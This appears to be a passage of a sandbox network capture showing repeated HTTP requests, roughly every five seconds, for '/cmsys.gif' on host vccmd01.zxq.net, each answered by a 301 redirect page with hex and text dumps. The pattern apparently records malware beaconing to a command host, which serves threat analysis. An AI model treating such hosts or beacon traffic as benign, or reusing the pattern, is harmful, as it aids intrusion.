                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:45.159590960 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:45 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.441076994 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.622247934 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:50 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:55.971165895 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:56.165102005 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:10:56 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:01.591367960 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:01.776515961 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:01 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.484380960 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.666384935 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:07 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:13.062494040 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:13.243863106 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:13 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.611125946 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.790410995 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:18 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:24.206197977 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:24.386756897 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:24 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.861740112 CET201OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.zxq.net
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:30.041160107 CET1024INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                                                                    content-length: 795
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:11:29 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    location: https://zxq.net/cmsys.gif
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
